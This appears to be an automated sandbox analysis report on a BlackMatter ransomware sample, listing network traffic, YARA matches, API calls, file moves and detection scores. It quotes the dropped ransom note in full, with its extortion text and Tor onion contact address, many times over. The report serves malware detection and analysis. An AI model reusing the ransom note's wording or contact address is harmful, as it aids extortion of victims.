          Source: global trafficHTTP traffic detected: GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: Chrome/91.0.4472.77Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: global trafficHTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1821-5994-88c3-3f09ef5a5c59 HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: AppleWebKit/587.38 (KHTML, like Gecko)Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: global trafficHTTP traffic detected: GET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1822-00f0-90ca-3541d116f917 HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: AppleWebKit/587.38 (KHTML, like Gecko)Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
          Source: unknownHTTPS traffic detected: 103.224.212.222:443 -> 192.168.2.3:49755 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands:

          barindex
          Found ransom note / readmeShow sources
          Source: C:\Users\user\Videos\kVuoJyeoW.README.txtDropped file: ~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' .>>> What happens? Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.>>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises.>> Data leak includes1. Full emloyeers personal data2. Network information3. Schemes of buildings, active project information, architect details and contracts, 4. Finance info>>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.Jump to dropped file
          Yara detected BLACKMatter RansomwareShow sources
          Source: Yara matchFile source: 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GlLHM7paoZ.exe PID: 4540, type: MEMORYSTR
          Changes the wallpaper pictureShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Desktop WallPaper C:\ProgramData\kVuoJyeoW.bmpJump to behavior
          Modifies existing user documents (likely ransomware behavior)Show sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.xlsxJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpgJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\EWZCVGNOWT.pngJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
          Writes a notice file (html or txt) to demand a ransomShow sources
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Videos\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Saved Games\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Searches\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile dropped: C:\Users\user\Contacts\kVuoJyeoW.README.txt -> decryptor for the entire network and you will restore all the data.>>> what guarantees? we are not a politically motivated group and we do not need anything other than your money. if you pay, we will provide you the programs for decryption and we will delete your data. if we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. we always keep our promises.>> data leak includes1. full emloyeers personal data2. network information3. schemes of buildings, active project information, architect details and contracts, 4. finance info>>> how to contact with us? 1. download and install tor browser (https://www.torproject.org/). 2. open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7nt6lxkc1xqhw5039blov. >>> warning! recovery recommendations. we strongly recommend you to do not modify or repair your files, that will damage them.Jump to dropped file

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: GlLHM7paoZ.exe, type: SAMPLEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: Detect BlackMatter ransomware Author: Arkbird_SOLG
          Source: GlLHM7paoZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: GlLHM7paoZ.exe, type: SAMPLEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpack, type: UNPACKEDPEMatched rule: RAN_BlackMatter_Aug_2021_1 date = 2021-08-02, hash2 = 7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984, hash1 = 22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6, level = Experimental, author = Arkbird_SOLG, description = Detect BlackMatter ransomware, adversary = -, reference = https://twitter.com/abuse_ch/status/1421834305416933376, tlp = white
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F51E80_2_010F51E8
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F207C0_2_010F207C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F4CD80_2_010F4CD8
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F4CD30_2_010F4CD3
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F890B CreateThread,ResumeThread,GetExitCodeThread,NtClose,0_2_010F890B
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9F23 RegCreateKeyExW,RegQueryValueExW,NtClose,0_2_010F9F23
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7F4C NtClose,0_2_010F7F4C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9554 NtSetInformationProcess,NtSetInformationProcess,0_2_010F9554
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8766 NtSetInformationThread,0_2_010F8766
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6393 NtQueryInformationToken,0_2_010F6393
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010FB790 CreateThread,NtClose,0_2_010FB790
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F73C1 NtQuerySystemInformation,0_2_010F73C1
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6245 RegCreateKeyExW,RegQueryValueExW,NtClose,0_2_010F6245
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F9494 NtQueryInformationToken,0_2_010F9494
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EA7 NtQuerySystemInformation,0_2_010F7EA7
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F92E1 NtSetInformationThread,0_2_010F92E1
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F73F3 NtQuerySystemInformation,0_2_010F73F3
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F740C NtQuerySystemInformation,0_2_010F740C
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EE0 NtQuerySystemInformation,0_2_010F7EE0
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F7EF9 NtQuerySystemInformation,0_2_010F7EF9
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8DC6: FindFirstVolumeW,GetVolumePathNamesForVolumeNameW,GetDriveTypeW,CreateFileW,DeviceIoControl,0_2_010F8DC6
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeProcess token adjusted: SecurityJump to behavior
          Source: GlLHM7paoZ.exeStatic PE information: Section: .rsrc ZLIB complexity 0.990792410714
          Source: GlLHM7paoZ.exeVirustotal: Detection: 86%
          Source: GlLHM7paoZ.exeMetadefender: Detection: 77%
          Source: GlLHM7paoZ.exeReversingLabs: Detection: 92%
          Source: GlLHM7paoZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\kVuoJyeoW.README.txtJump to behavior
          Source: classification engineClassification label: mal100.rans.evad.winEXE@1/176@6/2
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8C6E GetDiskFreeSpaceExW,0_2_010F8C6E
          Source: GlLHM7paoZ.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\d2c777569925c4c22958338e72708f92
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: GlLHM7paoZ.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GlLHM7paoZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG